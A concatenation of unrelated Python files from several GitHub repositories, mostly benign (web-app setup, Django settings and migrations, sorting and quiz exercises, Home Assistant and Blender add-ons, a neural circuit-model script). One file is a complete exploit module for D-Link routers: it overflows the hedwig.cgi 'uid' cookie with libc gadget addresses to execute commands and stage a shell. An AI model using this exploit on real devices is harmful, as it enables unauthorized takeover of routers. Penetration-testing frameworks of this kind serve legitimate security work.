no_license
lucassimon/civilizations
067193e17e7651a9fecb53f2b6e459c15ff4c97b
db8db27bb56ccda8c23059de88c60ef8d9670cb0
refs/heads/master
2020-03-29T13:16:01.025175
2018-12-29T18:22:45
2018-12-29T18:22:45
149,949,155
0
0
null
null
null
null
UTF-8
Python
false
false
499
py
# -*- coding: utf-8 -*- # Python Libs. from vibora import Vibora, Response # -*- coding: utf-8 -*- from vibora.hooks import Events from .config import config from .api import api def create_app(config_name): app = Vibora() @app.handle(Events.AFTER_ENDPOINT) async def before_response(response: Response): response.headers['x-my-custom-header'] = 'Hello :)' app.components.add(config[config_name]()) app.add_blueprint(api, prefixes={'v1': '/v1'}) return app
367d5083a97e5d006b5ed778da35518abfec3376
3f50e7f6894fc8eea825502b846dc0967493f7a4
/doc-src/objects/index.py
53bceb10edb9127c2df0acace412c55eba5bbc78
[ "MIT" ]
permissive
bavardage/qtile
92e62bc3195f3cfb0059afaa3dd008bd490caa6a
c384d354f00c8d025d0eff3e5e292303ad4b4e58
refs/heads/master
2021-01-16T00:49:34.141225
2009-03-26T16:54:51
2009-03-26T16:54:51
106,682
4
0
null
null
null
null
UTF-8
Python
false
false
235
py
from countershape.doc import * pages = [ Page("barsngaps.html", "Bars and Gaps"), Page("groups.html", "Groups"), Page("layouts.html", "Layouts"), Page("screens.html", "Screens"), Page("widgets.html", "Widgets"), ]
986d770ae16a5a17ea8ab21a9c8611ad9ec844f3
e62b1e748582584a5c2a05fff970fe09e72752b4
/app/migrations/0084_auto_20200312_2145.py
78c8618744d5f9bd75ef8f090009cc7f7e073750
[]
no_license
wlodekf/jpk
5957b515ecbcded9b4f27d6a0785ee89e3a0d585
1c200350f57469e890a124d07f741d836d9a0833
refs/heads/master
2023-07-10T20:15:11.111276
2021-08-11T12:21:14
2021-08-11T12:21:14
394,978,461
1
0
null
null
null
null
UTF-8
Python
false
false
645
py
# -*- coding: utf-8 -*- # Generated by Django 1.9.14.dev20170906233242 on 2020-03-12 21:45 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0083_auto_20200304_1321'), ] operations = [ migrations.AddField( model_name='plik', name='kod_systemowy', field=models.CharField(max_length=20, null=True), ), migrations.AddField( model_name='plik', name='wersja_schemy', field=models.CharField(max_length=5, null=True), ), ]
204aa6d13a66a0db1220d1ef9864c83c98c175d0
efd6a277c2d5bffdfba6ccb4d5efd555e652d29e
/chap7/7.7.py
7c207a1ed18a1835e5860abdacf3a292352aca05
[]
no_license
CavalcanteLucas/cookbook
dd57583c8b5271879bb086783c12795d1c0a7ee8
09ac71e291571e3add8d23d79b1684b356702a40
refs/heads/master
2020-03-25T03:09:39.608599
2019-09-13T04:43:23
2019-09-13T04:43:23
143,325,952
0
0
null
2020-09-25T05:46:30
2018-08-02T17:32:08
Python
UTF-8
Python
false
false
45
py
# Capturing Variable in Anonymous Functions
d4e579745fae8a47e60cc476411f97325d51b3fc
9a9e47d9cf1f663de411218a533c10bbf288cc9d
/config/wsgi.py
bc1f238dd14822d7df2fe5c0fdcf05f70c23e3ec
[ "MIT" ]
permissive
eyobofficial/Gebeya-Schedule-Bot
110f862a5e905c127e23ec0ad9bc9406f4180859
8c757fa8c26cf5dda6f917997c521d0f37b28aa9
refs/heads/development
2022-12-14T10:23:17.323365
2019-09-16T18:28:37
2019-09-16T18:28:37
204,556,349
3
2
MIT
2022-04-22T22:17:15
2019-08-26T20:31:16
Python
UTF-8
Python
false
false
442
py
""" WSGI config for config project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/ """ import os from decouple import config from django.core.wsgi import get_wsgi_application os.environ.setdefault( "DJANGO_SETTINGS_MODULE", config("DJANGO_SETTINGS_MODULE") ) application = get_wsgi_application()
fe67b587acb41838b627af66ca34a11ad458a34e
7aa4e4bfee6b0a265a4bcf1b7f81291f3299f43b
/Day17/quiz_brain.py
144287abfa11e8d10c95fbeb19d7332d51e1fc84
[]
no_license
fazer1929/100DaysOfCode_Python
464b54e33fdda25f985a4a7fde327ceafc88fa93
313cd77ad7266b18fd2442548569cf96f330ce26
refs/heads/main
2023-05-05T01:59:48.936964
2021-05-30T14:34:57
2021-05-30T14:34:57
311,775,381
0
0
null
null
null
null
UTF-8
Python
false
false
868
py
class QuizBrain: def __init__(self,qlist): self.question_list = qlist self.question_number = 0 self.score = 0 def nextQuestion(self): self.question_number += 1 question = self.question_list[self.question_number] ans = input(f"Q.{self.question_number}: {question.text} (True/False)? : ") self.checkAnswer(ans) def stillHasQuestion(self): return self.question_number < len(self.question_list) def checkAnswer(self,ans): if(ans.lower() == self.question_list[self.question_number].ans.lower()): print("You Got It Right!") self.score += 1 else: print("You Got It Wrong!!!") print(f"The Correct Answer Was {self.question_list[self.question_number].ans}") print(f"Your Current Score is {self.score}/{self.question_number}")
466bd43facef0ff807850dc4caf2a5d061758411
72af42076bac692f9a42e0a914913e031738cc55
/01, 특강_210705_0706/02, source/CookData(2021.01.15)/Code03-02.py
77bba4c75ad3200137cbc7e4f6f9c010afb45baa
[]
no_license
goareum93/Algorithm
f0ab0ee7926f89802d851c2a80f98cba08116f6c
ec68f2526b1ea2904891b929a7bbc74139a6402e
refs/heads/master
2023-07-01T07:17:16.987779
2021-08-05T14:52:51
2021-08-05T14:52:51
376,908,264
0
0
null
null
null
null
UTF-8
Python
false
false
536
py
katok = ["다현", "정연", "쯔위", "사나", "지효"] def insert_data(position, friend) : if position < 0 or position > len(katok) : print("데이터를 삽입할 범위를 벗어났습니다.") return katok.append(None) # 빈칸 추가 kLen = len(katok) # 배열의 현재 크기 for i in range(kLen-1, position, -1) : katok[i] = katok[i-1] katok[i-1] = None katok[position] = friend # 지정한 위치에 친구 추가 insert_data(2, '솔라') print(katok) insert_data(6, '문별') print(katok)
65f9cfdb3e2d22893d9a562025b9bd322fc2b5d5
ca8fe12def17494b4fd8a97664d7d9fcb1f9121f
/notifier.py
5541ce560a39a17898c3957aad22a6fb585f744f
[]
no_license
pondelion/PassiveHealthMonitor
0d52c71bc8b8aa327680ef7585bd24a608bd4385
4072c4c161a0d4d1c7e86931edb70b4c076e96e4
refs/heads/main
2023-04-25T16:06:12.784931
2021-05-15T03:49:35
2021-05-15T03:49:35
null
0
0
null
null
null
null
UTF-8
Python
false
false
514
py
from abc import ABCMeta, abstractmethod from overrides import overrides class Notifier(metaclass=ABCMeta): @abstractmethod def notify( self, monitoring_target: str, notified_cpunt: int ) -> None: raise NotImplementedError class MockNotifier(Notifier): @overrides def notify( self, monitoring_target: str, notified_cpunt: int ) -> None: print(f'{monitoring_target} : {notified_cpunt}') DefaultNotifier = MockNotifier
f7721c25cf493ef1ded4213a2d67b41a3474dcfc
14b5679d88afa782dc5d6b35878ab043089a060a
/students/贾帅杰/home0529/hachina5.py
36d8ba5bc9fbfdee8285432c97c1d565fbda2281
[]
no_license
mutiangua/EIS2020
c541ef32623f67f9277945cd39cff3c02f06e4dd
92aa2711b763a2c93be238825c445bf2db8da391
refs/heads/master
2022-11-18T05:21:47.567342
2020-07-11T10:11:21
2020-07-11T10:11:21
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,617
py
# 引入datetime库用于方便时间相关计算 from datetime import timedelta import logging import voluptuous as vol # 引入HomeAssitant中定义的一些类与函数 # track_time_interval是监听时间变化事件的一个函数 from homeassistant.helpers.event import track_time_interval import homeassistant.helpers.config_validation as cv DOMAIN = "hachina5" ENTITYID = DOMAIN + ".hello_world" CONF_STEP = "step" DEFAULT_STEP = 3 #f=open("C:\\Users\\23004\\AppData\\Roaming\\.homeassistant\\custom_components\\num.txt", "r") # 定义时间间隔为3秒钟 TIME_BETWEEN_UPDATES = timedelta(seconds=1) _LOGGER = logging.getLogger(__name__) CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { # 一个配置参数“step”,只能是正整数,缺省值为3 vol.Optional(CONF_STEP, default=DEFAULT_STEP): cv.positive_int, }), }, extra=vol.ALLOW_EXTRA) def setup(hass, config): """配置文件加载后,setup被系统调用.""" conf = config[DOMAIN] step = conf.get(CONF_STEP) _LOGGER.info("Get the configuration %s=%d", CONF_STEP, step) attr = {"icon": "mdi:yin-yang", "friendly_name": "Door", "slogon": "积木构建智慧空间!", "unit_of_measurement": ""} # 构建类GrowingState GrowingState(hass, step, attr) return True class GrowingState(object): """定义一个类,此类中存储了状态与属性值,并定时更新状态.""" def __init__(self, hass, step, attr): """GrwoingState类的初始化函数,参数为hass、step和attr.""" # 定义类中的一些数据 self._hass = hass self._step = step self._attr = attr self._state = 0 # 在类初始化的时候,设置初始状态 self._hass.states.set(ENTITYID, self._state, attributes=self._attr) # 每隔一段时间,更新一下实体的状态 track_time_interval(self._hass, self.update, TIME_BETWEEN_UPDATES) def update(self, now): f=open("C:\Apache24\htdocs\\index.html", "r") data = f.read() # 读取文件 #datas=data[-4:] """在GrowingState类中定义函数update,更新状态.""" _LOGGER.info("GrowingState is "+data) # 状态值每次增加step self._state = self._state + self._step # 设置新的状态值 self._hass.states.set(ENTITYID, data, attributes=self._attr)
7023ccfa04ae9db5e41aa1991b5c1bdc4d513f2a
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p02948/s243741324.py
2cffaa3be99d436febcc3c638d3fc41cc448b571
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
491
py
from heapq import heappop,heappush,heapify from collections import deque N,M=map(int,input().split()) A,B,C = [0]*N,[0]*N,[0]*N for i in range(N): A[i],B[i] = map(int,input().split()) C[i]=[A[i],B[i]] C.sort() C=deque(C) a=[] heapify(a) ans=0 for i in range(M,-1,-1): while C: if C[0][0]<=M-i: heappush(a,(-1)*C[0][1]) C.popleft() else: break if len(a)>0: p = heappop(a) ans += (-1)*p print(ans)
4749a3c0908091555e12a2d95d89a42aa01f83f6
b1571f4ee376d789b8094777fd81c4fb47a89cf1
/AtCoder/練習/Beginners Selection/ABC087B.py
23846c48ce3cc1eb755514d5511a6d7951002ae6
[]
no_license
hiroyaonoe/Competitive-programming
e49e43f8853602ba73e658cab423bd91ebbe9286
2949e10eec3a38498bedb57ea41a2491916bab1c
refs/heads/master
2021-06-23T21:56:33.232931
2021-05-30T15:27:31
2021-05-30T15:27:31
225,863,783
2
0
null
2020-06-14T17:54:28
2019-12-04T12:37:24
Python
UTF-8
Python
false
false
595
py
a=int(input()) b=int(input()) c=int(input()) x=int(input()) cnt=0 for i in range(a+1): for j in range(b+1): for k in range(c+1): if x == 500*i+100*j+50*k:cnt+=1 print(cnt) ''' coinA=min(a,x//500) coinB=min(b,(x-coinA*500)//100) coinC=min(c,(x-coinB*100)//50) cnt=0 changeB=coinB changeC=coinC if 500*coinA+100*coinB+50*coinC>=x: while coinA>=0: while 0<=changeB<=b: if 0<=changeC<=c: cnt+=1 changeB-=1 changeC+=2 changeB=coinB changeC=coinC coinA-=1 changeB+=5 print(cnt) '''
c23dd5e12ae719e7b4616d5f20ac6bbd59a2fadb
4073f351551c2f73c5659cb3038a68360cc5b369
/Lärobok/kap 6/kap. 6, sid. 76 - sätta ihop strängar.py
a6ec6841d16836e6f2de9f964e810fd69f375383
[ "MIT" ]
permissive
Pharou/programmering1python
b9a5aca72354d3e7e91a5023a621d22a962ecd7c
9b689027db1f7fbf06925f3094fcb126880453e4
refs/heads/master
2022-11-28T06:33:17.295157
2020-07-25T11:02:07
2020-07-25T11:02:07
null
0
0
null
null
null
null
UTF-8
Python
false
false
572
py
#!/usr/bin/python3.8 # Filnamn: kap. 6, sid. 76 - sätta ihop strängar.py # Programmering 1 med Python - Lärobok # Kapitel 6 - Mer om teckensträngar i Python # Med plustecken kan du slå samman flera strängar till en enda. # Det kallas även konkatenering av strängar fn = 'Tage' ln = 'Test' name = fn + ln print(name) # Som du ser så skrivs inget mellanslag ut i den första print-satsen, # det måste du manuellt lägga in själv name = fn + ' ' + ln print(name) # Upprepning av strängar görs med multiplikationstecknet * print(3 * 'Hola!') print(15 * '-')
91c53302d52e9d5a99a4e0d0b685179371931b6d
cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45
/Personal/Jaypur/Jaypur/settings.py
76bd9d7c357d60980068b2b15d2475f763bef64f
[]
no_license
ProsenjitKumar/PycharmProjects
d90d0e7c2f4adc84e861c12a3fcb9174f15cde17
285692394581441ce7b706afa3b7af9e995f1c55
refs/heads/master
2022-12-13T01:09:55.408985
2019-05-08T02:21:47
2019-05-08T02:21:47
181,052,978
1
1
null
2022-12-08T02:31:17
2019-04-12T17:21:59
null
UTF-8
Python
false
false
3,158
py
""" Django settings for Jaypur project. Generated by 'django-admin startproject' using Django 2.1.3. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '_c4#s_+@o6kx5@ej$9+n-1)-_1+0rqscbzrd()25q=f@=e7m34' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'app.apps.AppConfig', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'Jaypur.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')] , 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'Jaypur.wsgi.application' # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': { 
'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/'
2c5bad20f3963b0a05c987b18b93b70740c5217f
543e4a93fd94a1ebcadb7ba9bd8b1f3afd3a12b8
/maza/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
cda6380b6efab9cd5609c5c1aeab67de8cb19247
[ "MIT" ]
permissive
ArturSpirin/maza
e3127f07b90034f08ff294cc4afcad239bb6a6c3
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
refs/heads/master
2020-04-10T16:24:47.245172
2018-12-11T07:13:15
2018-12-11T07:13:15
161,144,181
2
0
null
null
null
null
UTF-8
Python
false
false
2,810
py
import struct

from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    """Remote code execution against D-Link routers via a buffer overflow
    in the Hedwig CGI component (oversized "uid" cookie)."""

    # Module metadata consumed by the framework loader / UI.
    __info__ = {
        "name": "D-Link Hedwig CGI RCE",
        "description": "Module exploits buffer overflow vulnerablity in D-Link Hedwig CGI component, "
                       "which leads to remote code execution.",
        "authors": (
            "Austin <github.com/realoriginal>",  # routersploit module
        ),
        "references": (
            "http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
            "http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
            "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt",
            "https://www.exploit-db.com/exploits/27283/",
        ),
        "devices": (
            "D-Link DIR-645 Ver. 1.03",
            "D-Link DIR-300 Ver. 2.14",
            "D-Link DIR-600",
        ),
    }

    # User-configurable exploit options.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        # Entry point: verify exploitability, then stage an interactive shell.
        if self.check():
            print_success("Target is vulnerable")
            # Upload a MIPS little-endian payload via echo into /tmp, make it
            # executable, run it, and remove it afterwards.
            shell(self, architecture="mipsle", method="echo", location="/tmp",
                  echo_options={"prefix": "\\\\x"},
                  exec_binary="chmod 777 {0} && {0} && rm {0}")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        # Run *cmd* on the target through the hedwig.cgi overflow and return
        # the command's textual output ("" if the request failed).
        cmd = cmd.encode("utf-8")

        # NOTE(review): addresses presumably taken from the vulnerable
        # firmware's libc (see the greyhats advisory) — confirm before
        # porting to other firmware builds.
        libcbase = 0x2aaf8000
        system = 0x000531FF
        calcsystem = 0x000158C8
        callsystem = 0x000159CC

        # Padding up to the saved return address, then gadget addresses that
        # route execution into system() with the appended command string.
        shellcode = utils.random_text(973).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + system)      # little-endian 32-bit
        shellcode += utils.random_text(16).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + callsystem)
        shellcode += utils.random_text(12).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + calcsystem)
        shellcode += utils.random_text(16).encode("utf-8")
        shellcode += cmd

        # The overflow is triggered by the oversized "uid" cookie value.
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": b"uid=" + shellcode + b";"
        }

        # Arbitrary POST body; only the cookie matters for the exploit.
        data = {
            utils.random_text(7): utils.random_text(7)
        }

        response = self.http_request(
            method="POST",
            path="/hedwig.cgi",
            headers=headers,
            data=data,
        )

        if response is None:
            return ""

        # Command output follows the closing </hedwig> tag in the response.
        return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()

    @mute
    def check(self):
        # Vulnerable iff echoing a random marker through execute() round-trips.
        fingerprint = utils.random_text(10)
        cmd = "echo {}".format(fingerprint)

        response = self.execute(cmd)
        if fingerprint in response:
            return True

        return False
b84dd9230ccb462252288d436554e4655ed6d463
58a82d4b72e8c83d8c93a3d3639aa65fbdc9fcbd
/BCPrompt/bc_operators.py
a9acc39d4ec5b58e487e2b05b20c2289164e5737
[]
no_license
8Observer8/myblendercontrib
4de9b880da56a909b3da19c732e32557ab48400b
71aa26457c50622cf5646a7aa39fbe11491f3e7b
refs/heads/master
2021-01-15T15:33:13.133667
2015-10-14T15:38:48
2015-10-14T15:38:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,961
py
import bpy
from console_python import add_scrollback
from .bc_command_dispatch import (
    in_scene_commands, in_search_commands, in_sverchok_commands,
    in_core_dev_commands, in_modeling_tools, in_upgrade_commands,
    in_bpm_commands, in_fast_ops_commands)

# Convenience aliases for Blender operators used by this console add-on.
history_append = bpy.ops.console.history_append
addon_enable = bpy.ops.wm.addon_enable


def print_most_useful():
    # Write the quick-reference command table into the console scrollback.
    # (Table column alignment reconstructed — original spacing was lost.)
    content = '''\
for full verbose descriptor use -man
command    | description
-----------+----------------
tt | tb    | turntable / trackball nav.
cen        | centers 3d cursor
cenv       | centers 3d cursor, aligns views to it
cento      | centers to selected
endswith!  | copy current console line if ends with exclm.
x?bpy      | search blender python for x
x?bs       | search blenderscripting.blogspot for x
x?py       | search python docs for x
x?se       | search B3D StackExchange
x??se      | regular StackExchange search
vtx, xl    | enable or trigger tinyCAD vtx (will download)
ico        | enables icon addon in texteditor panel (Dev)
123        | use 1 2 3 to select vert, edge, face
-img2p     | enabled image to plane import addon
-or2s      | origin to selected.
-dist      | gives local distance between two selected verts
-gist -o x | uploads all open text views as x to anon gist.
-debug     | dl + enable extended mesh index visualiser. it's awesome.
-----------+----------------------------------------------------------
-idxv      | enable by shortcut name (user defined)
enable <named addon> | package name or folder name
v2rdim     | sets render dimensions to current strip.
fc         | fcurrent -> end.frame
'''
    add_scrollback(content, 'OUTPUT')


class TextSyncOps(bpy.types.Operator):
    """Reload the active text block from disk, discarding the editor copy."""
    bl_idname = "text.text_upsync"
    bl_label = "Upsyncs Text from disk changes"

    def execute(self, context):
        text_block = context.edit_text  # NOTE(review): unused — confirm it can be dropped
        bpy.ops.text.resolve_conflict(resolution='RELOAD')
        return{'FINISHED'}


class ConsoleDoAction(bpy.types.Operator):
    """Dispatch the most recent console input line to the command handlers."""
    bl_label = "ConsoleDoAction"
    bl_idname = "console.do_action"

    def execute(self, context):
        # Last line typed into the interactive console.
        m = bpy.context.space_data.history[-1].body
        m = m.strip()

        DONE = {'FINISHED'}

        # Each dispatcher returns truthy when it recognized and ran the command.
        if any([
            in_scene_commands(context, m),
            in_search_commands(context, m),
            in_sverchok_commands(context, m),
            in_core_dev_commands(context, m),
            in_modeling_tools(context, m),
            in_upgrade_commands(context, m),
            in_bpm_commands(context, m),
            in_fast_ops_commands(context, m)
        ]):
            return DONE

        elif m == '-ls':
            # Built-in: show the quick-reference table.
            print_most_useful()
            return DONE

        elif m == 'cl':
            # Built-in: clear the console.
            bpy.ops.console.clear()
            return DONE

        return {'FINISHED'}


def register():
    bpy.utils.register_module(__name__)


def unregister():
    bpy.utils.unregister_module(__name__)
5d6ded4faf7566b8fb858f56738f9b733236abda
a3776dfa7a4bfd76ff7cb63ddb3f6d70483b89d2
/python/Sort/BubbleSort.py
fe4c0e4f183df93e94e89a9a26fea609cdd7d9a2
[]
no_license
x-jeff/Algorithm_Code
9e3038d9504391e2bd52ddde1230f69953339ab8
b0411bcc7a7ab674ceca73aeb1348d3241370817
refs/heads/master
2023-07-11T19:55:52.401814
2021-08-14T03:46:12
2021-08-14T03:46:12
293,771,649
0
0
null
null
null
null
UTF-8
Python
false
false
321
py
def bubbleSort(arr): for i in range(1, len(arr)): for j in range(0, len(arr)-i): if arr[j] > arr[j+1]: arr[j], arr[j + 1] = arr[j + 1], arr[j] return arr if __name__ == '__main__': testlist = [17, 23, 20, 14, 12, 25, 1, 20, 81, 14, 11, 12] print(bubbleSort(testlist))
ac126a334e5c16ab0f0e7c96bd9e37e9401d058a
d0081f81996635e913b1f267a4586eb0bfd3dcd5
/dataactcore/migrations/versions/001758a1ab82_remove_legal_entity_address_line3_from_.py
a17f33249deb510d2d5a9c4c694595932bedba00
[ "CC0-1.0" ]
permissive
fedspendingtransparency/data-act-broker-backend
71c10a6c7c284c8fa6556ccc0efce798870b059b
b12c73976fd7eb5728eda90e56e053759c733c35
refs/heads/master
2023-09-01T07:41:35.449877
2023-08-29T20:14:45
2023-08-29T20:14:45
57,313,310
55
36
CC0-1.0
2023-09-13T16:40:58
2016-04-28T15:39:36
Python
UTF-8
Python
false
false
994
py
"""Remove legal_entity_address_line3 from DetachedAwardFinancialAssistance Revision ID: 001758a1ab82 Revises: 60830f0881a5 Create Date: 2018-03-09 10:50:38.640532 """ # revision identifiers, used by Alembic. revision = '001758a1ab82' down_revision = '60830f0881a5' branch_labels = None depends_on = None from alembic import op import sqlalchemy as sa def upgrade(engine_name): globals()["upgrade_%s" % engine_name]() def downgrade(engine_name): globals()["downgrade_%s" % engine_name]() def upgrade_data_broker(): ### commands auto generated by Alembic - please adjust! ### op.drop_column('detached_award_financial_assistance', 'legal_entity_address_line3') ### end Alembic commands ### def downgrade_data_broker(): ### commands auto generated by Alembic - please adjust! ### op.add_column('detached_award_financial_assistance', sa.Column('legal_entity_address_line3', sa.TEXT(), autoincrement=False, nullable=True)) ### end Alembic commands ###
367694bf22eedbb89985c70d2368890832e317f2
23d5370d1b4d889aba0c2bfccfe3fcc8bced7bf4
/examples/RLC_example/test/RLC_IO_I_eval_sim.py
7106cd0859cc1a4f13867be28def0f2e4708d138
[ "MIT" ]
permissive
marcosfelt/sysid-neural-structures-fitting
0cd21b4197b52ffe5ef78ac4045a431e202fdb05
80eda427251e8cce1d2a565b5cbca533252315e4
refs/heads/master
2022-12-06T18:45:21.365282
2020-09-03T18:32:16
2020-09-03T18:32:16
292,630,318
0
0
MIT
2020-09-03T17:01:34
2020-09-03T17:01:33
null
UTF-8
Python
false
false
4,273
py
# Evaluate a trained neural IO model of an RLC circuit by open-loop
# simulation against a recorded dataset, then plot and score the fit.
import pandas as pd
import numpy as np
import torch
import matplotlib.pyplot as plt
import os
import sys
sys.path.append(os.path.join("..", ".."))  # make the repo-local packages importable
from torchid.iofitter import NeuralIOSimulator
from torchid.iomodels import NeuralIOModel
from common import metrics

if __name__ == '__main__':

    # Which dataset and which trained model variant to evaluate.
    dataset_type = 'id'
    #dataset_type = 'val'

    #model_type = '32step_noise'
    model_type = '64step_noise'
    # model_type = '1step_nonoise'
    # model_type = '1step_noise'

    plot_input = False  # also plot the input voltage in a second subplot

    # Column names in the CSV dataset.
    COL_T = ['time']
    COL_X = ['V_C', 'I_L']
    COL_U = ['V_IN']
    COL_Y = ['I_L']
    dataset_filename = f"RLC_data_{dataset_type}.csv"
    df_X = pd.read_csv(os.path.join("data", dataset_filename))

    time_data = np.array(df_X[COL_T], dtype=np.float32)
    # y = np.array(df_X[COL_Y], dtype=np.float32)
    x = np.array(df_X[COL_X], dtype=np.float32)
    u = np.array(df_X[COL_U], dtype=np.float32)
    # Output channel selector within the state columns COL_X.
    y_var_idx = 1  # 0: voltage 1: current
    y = np.copy(x[:, [y_var_idx]])
    N = np.shape(y)[0]
    Ts = time_data[1] - time_data[0]  # sampling period (assumes uniform sampling)

    n_a = 2  # autoregressive coefficients for y
    n_b = 2  # autoregressive coefficients for u
    n_max = np.max((n_a, n_b))  # delay

    # Additive measurement noise, per state channel (V, I).
    std_noise_V = 1.0 * 10.0
    std_noise_I = 1.0 * 1.0
    std_noise = np.array([std_noise_V, std_noise_I])
    x_noise = np.copy(x) + np.random.randn(*x.shape) * std_noise
    x_noise = x_noise.astype(np.float32)
    y_noise = x_noise[:, [y_var_idx]]

    # Initialize optimization
    io_model = NeuralIOModel(n_a=n_a, n_b=n_b, n_feat=64)
    io_solution = NeuralIOSimulator(io_model)
    model_filename = f"model_IO_I_{model_type}.pkl"
    io_solution.io_model.load_state_dict(torch.load(os.path.join("models", model_filename)))

    # In[Validate model]
    # Evaluate over the full record.
    t_val_start = 0
    t_val_end = time_data[-1]
    idx_val_start = int(t_val_start//Ts)#x.shape[0]
    idx_val_end = int(t_val_end//Ts)#x.shape[0]

    n_val = idx_val_end - idx_val_start
    u_val = np.copy(u[idx_val_start:idx_val_end])
    y_val = np.copy(y[idx_val_start:idx_val_end])
    y_meas_val = np.copy(y_noise[idx_val_start:idx_val_end])
    time_val = time_data[idx_val_start:idx_val_end]

    # Zero initial regressors for the open-loop simulation.
    y_seq = np.zeros(n_a, dtype=np.float32)  #np.array(np.flip(y_val[0:n_a].ravel()))
    u_seq = np.zeros(n_b, dtype=np.float32 ) #np.array(np.flip(u_val[0:n_b].ravel()))

    # Neglect initial values
    # y_val = y_val[n_max:, :]
    # y_meas_val = y_meas_val[n_max:, :]
    # u_val = u_val[n_max:, :]
    # time_val = time_val[n_max:, :]

    y_meas_val_torch = torch.tensor(y_meas_val)

    # Open-loop simulation of the IO model; no gradients needed.
    with torch.no_grad():
        y_seq_torch = torch.tensor(y_seq)
        u_seq_torch = torch.tensor(u_seq)

        u_torch = torch.tensor(u_val)
        y_val_sim_torch = io_solution.f_sim(y_seq_torch, u_seq_torch, u_torch)

        err_val = y_val_sim_torch - y_meas_val_torch
        loss_val = torch.mean((err_val)**2)  # MSE against the noisy measurement

    # Plot window depends on the dataset.
    if dataset_type == 'id':
        t_plot_start = 0.2e-3
    else:
        t_plot_start = 1.0e-3
    t_plot_end = t_plot_start + 0.3e-3

    idx_plot_start = int(t_plot_start//Ts)#x.shape[0]
    idx_plot_end = int(t_plot_end//Ts)#x.shape[0]

    # In[Plot]
    y_val_sim = np.array(y_val_sim_torch)
    time_val_us = time_val *1e6  # seconds -> microseconds for the x axis

    if plot_input:
        fig, ax = plt.subplots(2,1, sharex=True)
    else:
        fig, ax = plt.subplots(1, 1, sharex=True)
        ax = [ax]  # normalize to a list so ax[0] works in both branches
    ax[0].plot(time_val_us[idx_plot_start:idx_plot_end], y_val[idx_plot_start:idx_plot_end], 'k', label='True')
    ax[0].plot(time_val_us[idx_plot_start:idx_plot_end], y_val_sim[idx_plot_start:idx_plot_end], 'r--', label='Model simulation')
    ax[0].legend(loc='upper right')
    ax[0].grid(True)
    ax[0].set_xlabel("Time ($\mu$s)")
    # NOTE(review): y_var_idx = 1 selects the current I_L, yet this label says
    # "Capacitor voltage" — confirm which signal is actually plotted.
    ax[0].set_ylabel("Capacitor voltage $v_C$ (V)")
    ax[0].set_ylim([-20, 20])
    if plot_input:
        ax[1].plot(time_val_us[idx_plot_start:idx_plot_end], u_val[idx_plot_start:idx_plot_end], 'k', label='Input')
